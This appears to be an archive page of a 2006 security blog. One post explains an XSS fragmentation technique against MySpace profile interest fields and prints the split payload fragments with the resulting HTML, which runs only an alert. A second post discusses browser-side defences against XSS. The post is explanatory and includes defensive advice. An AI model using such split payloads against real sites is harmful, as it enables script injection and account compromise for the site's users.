RETURN $ecure;

Security, Technology and Life

Archive for October 2006

XSS Fragmentation and MySpace 0day

leave a comment »

kuza55 wrote a very good article on implementing fragmenation attacks with XSS.

At the simplest level, fragmentation attacks are possible when several fragments, which are by themselves not a security risk and can therefore be allowed to pass through a filter or firewall, but when the fragments reach their destination the fragments are combined and produce something dangerous.

The actual exploit is using <body foo=’  in your “Music Interests” box for your profile.
It then puts everything splitting the Music and Film sections into the foo attribute. In the Movies section of your interests you put  ‘ onLoad=’alert(“xss”);> This turns out something like this.

<tr id=MusicRow><td valign=”top” align=”left” width=”100″ bgcolor=”#b1d0f0″><span class=”lightbluetext8″>Music</span></td><td id=”ProfileMusic” width=”175″ bgcolor=”#d5e8fb” style=”WORD-WRAP: break-word”>Music</span></td><td id=’ProfileMusic’ width=’175′ bgcolor=’#d5e8fb’ style=”WORD-WRAP: break-word”><body test='</td></tr><script language=”JavaScript”>highlightInterests(“ProfileMusic”);</script><tr id=MoviesRow><td valign=”top” align=”left” width=”100″ bgcolor=”#b1d0f0″><span class=”lightbluetext8″>Movies</span></td><td id=”ProfileMovies” width=”175″ bgcolor=”#d5e8fb” style=”WORD-WRAP: break-word”>’ onLoad=’alert(“Salut?”);’></body></html></td></tr><script language=”JavaScript”>highlightInterests(“ProfileMovies”);</script>

As you can see, there are no single quotes between the two interest fields. Which makes the second field execute the event handler code. This is a prime example of why you should not do contextual blacklisting. This means, don’t be looking for completed html tags, proper formatting, etc. If I put a <style> tag in a field then use the javascript directive later in the page but still within the style, it will run, but if I use it in the same field, it will be blocked. Instead you should turn many non-alphanumeric characters into their HTML equivelants.

Live code. Uses Malucs CSRF of changing your Preferred language to french.

Advertisements

Written by Rodney G

10/22/2006 at 1:44 pm

Posted in Uncategorized

Tagged with

Client-Side protection from XSS

with one comment

Earlier today, on the sla.ckers.org forums, there was mention of virtual machines, anti-phishing toolbars and XSS. This got me to thinking about what users could do to protect themselves from phishing and other XSS-induced troubles. Now, a virtual machine may protect from virus’, but it does nothing for XSS. The cookies for your virtual machines browser are still accessible from within that virtual machine. RSnake mentioned it could prevent Intranet scanning. So, perhaps they could be used in a corporate setting. As I said on the forums…

I would browse inside from a virtual machine, but if it’s a virus, I will reformat. If it’s XSS, my info is gone anyways.

But what about other protection? Firefox 2.0 has an anti-phishing feature. How does this work exactly?

Phishing Protection is turned on by default in Firefox 2, and works by checking the sites that you browse to against a list of known phishing sites. This list is automatically downloaded and regularly updated within Firefox 2 when the Phishing Protection feature is enabled. Since phishing attacks can occur very quickly, there’s also an option to check the sites you browse to against an online service such as Google for more up-to-date protection. This enhanced capability can be turned on via the Security preferences pane.

So, basically it checks the domain against a list of known phishing sites. Great!, but again, does nothing against XSS. A site vulnerable to XSS that you regularly browse will be seen as a non-phishing site due to the domain name. ( site.com/search/<xss> ) but the script will still execute and your information, again, is lost! A great feature, against normal phishing attempts.

 So, perhaps at the browser level? Nope. Not there. The only one even close is Opera. It detects invalid domain characters in the address bar. But they seem to have no interest in expanding the ‘feature’ to hinder XSS. I suggested it to the MozillaZine community, even with help from RSnake and they didn’t exactly jump onto the idea either.

 So, it boils down to this simple fact. For now, we are totally dependant on web developers to be aware of the security risks and use good development practices.

Written by Rodney G

10/11/2006 at 7:31 pm

Posted in Uncategorized

Tagged with